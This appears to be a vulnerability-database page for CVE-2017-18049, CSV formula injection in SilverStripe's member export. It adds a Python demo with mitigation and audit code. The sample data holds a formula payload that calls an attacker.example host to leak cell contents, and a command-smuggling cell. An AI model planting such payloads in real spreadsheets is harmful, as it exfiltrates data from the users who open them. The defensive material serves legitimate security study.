cbcvebase.
CVE-2017-18049
published 2018-01-23

Priority: P4 (20)
Severity: medium, 5.5 (CVSS 3.0)
Vector: AV:L / AC:L / PR:N / UI:R / S:U / C:N / I:H / A:N
EPSS: 0.92% (55.7th percentile)
In the CSV export feature of SilverStripe before 3.5.6, 3.6.x before 3.6.3, and 4.x before 4.0.1, it's possible for the output to contain macros and scripts, which may be executed if imported without sanitization into common software (including Microsoft Excel). For example, the CSV data may contain untrusted user input from the "First Name" field of a user's /myprofile page.
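The issue described above is CSV (formula) injection: a member-controlled string such as a First Name is written verbatim into the export, and a spreadsheet that imports the file treats a cell beginning with `=`, `+`, `-` or `@` as a formula rather than text. The following is an added example, not SilverStripe's own code, written in Python rather than PHP so it runs stand-alone; the member records are constructed, and `export_csv(..., sanitize=False)` reproduces the vulnerable behaviour next to the hardened output. `dangerous_cells` is an audit helper you can run over an existing export to find cells that would be interpreted as formulas.

```python
import csv
import io

# Characters that Excel and LibreOffice treat as the start of a formula when a
# cell is imported from CSV. Tab and carriage return are included because some
# importers strip them and then interpret whatever follows.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample rows (not real SilverStripe data): one member has set a
# hostile "First Name" on /myprofile, the others are benign.
SAMPLE_MEMBERS = [
    {"FirstName": "Alice", "Surname": "Smith", "Email": "alice@example.com"},
    {"FirstName": '=HYPERLINK("http://attacker.example/?c="&A1,"click")',
     "Surname": "Mallory", "Email": "mallory@example.com"},
    {"FirstName": "-1+1|cmd", "Surname": "Bob", "Email": "bob@example.com"},
]
FIELDS = ["FirstName", "Surname", "Email"]


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet importer would treat this cell as a formula."""
    stripped = value.lstrip()  # leading spaces are ignored by some importers
    return bool(stripped) and stripped[0] in FORMULA_TRIGGERS


def neutralise_cell(value):
    """Escape a cell so spreadsheets display it as literal text.

    A leading single quote makes Excel/LibreOffice keep the cell as a string.
    Embedded double quotes are already doubled by the CSV writer, so only the
    formula trigger needs handling here. Non-strings pass through unchanged.
    """
    if isinstance(value, str) and is_formula_like(value):
        return "'" + value
    return value


def export_csv(rows, fields, sanitize):
    """Render rows as CSV text.

    sanitize=False mirrors the vulnerable export (raw values written straight
    into the file); sanitize=True applies neutralise_cell to every value.
    """
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fields, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        out = {k: (neutralise_cell(v) if sanitize else v) for k, v in row.items()}
        writer.writerow(out)
    return buf.getvalue()


def dangerous_cells(csv_text: str):
    """Audit an export: (row, column, value) for every formula-like cell."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                hits.append((r, c, cell))
    return hits


if __name__ == "__main__":
    vulnerable = export_csv(SAMPLE_MEMBERS, FIELDS, sanitize=False)
    hardened = export_csv(SAMPLE_MEMBERS, FIELDS, sanitize=True)
    print("Vulnerable export flags:", dangerous_cells(vulnerable))
    print("Hardened export flags:", dangerous_cells(hardened))
    print(hardened)
```

The single-quote prefix is the conventional mitigation because it survives a round trip through Excel and LibreOffice, but it is visible to any consumer that is not a spreadsheet, so some exporters instead prefix such cells with a tab or reject them at input time; whichever you choose, apply it at the export boundary, not in the stored record, so the original First Name is unchanged elsewhere in the application.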

Affected

6 ranges

Vendor       | Product      | Version range      | Fixed in
silverstripe | framework    | >= 0, < 3.5.6      | 3.5.6
silverstripe | framework    | >= 3.6.0, < 3.6.3  | 3.6.3
silverstripe | framework    | >= 4.0.0, < 4.0.1  | 4.0.1
silverstripe | silverstripe | <= 3.5.5           |
silverstripe | silverstripe |                    |
silverstripe | silverstripe | 3.6.0 – 3.6.2      |

CVSS provenance

Source | Version | Score | Severity | Vector
nvd    | v3.0    | 5.5   | MEDIUM   | CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
nvd    | v2.0    | 4.3   | MEDIUM   | AV:N/AC:M/Au:N/C:N/I:P/A:N